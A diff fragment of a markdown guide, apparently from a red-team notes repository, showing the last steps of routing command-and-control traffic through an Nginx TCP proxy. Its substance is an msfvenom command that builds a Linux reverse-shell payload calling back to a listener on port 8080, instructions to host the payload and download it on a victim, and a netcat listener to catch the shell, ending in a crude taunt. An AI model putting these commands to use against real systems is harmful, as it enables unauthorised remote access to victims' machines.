idkmq/CTE-For-Monkeys/WIP/proxy-nginx-tcpbs.md

     }
     ```
-5. Now lets reload Nginx with the new conf figles
+6. Now lets reload Nginx with the new config files
     ```bash
     sudo systemctl restart nginx.service
     ```
-6. From here we can now create a msfvenom shell or poshc2 with the correct ports set in the TCP section in the example we have `8080`
+7. From here we can now create a msfvenom shell or poshc2 with the correct ports set in the TCP section in the example we have `8080`
     ```bash
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.178.132 LPORT=8080 -a x64 -f elf > yup.elf
     ```
     > **NOTE:** Follow the same setup if you are using poshc2 for you bind port, probably
-7. Host your payload however and download on victim
+8. Host your payload however and download on victim
-8. Now if you are running msfvenom start you `nc` listener to catch your beacon.
+9. Now if you are running msfvenom start you `nc` listener to catch your beacon.
     ```bash
-    sudo nc -lnvp
+    sudo nc -lnvp 80
     ```
-9.  tada you have a beacon shelley, fuck you.
+10. tada you have a beacon shelley, fuck you.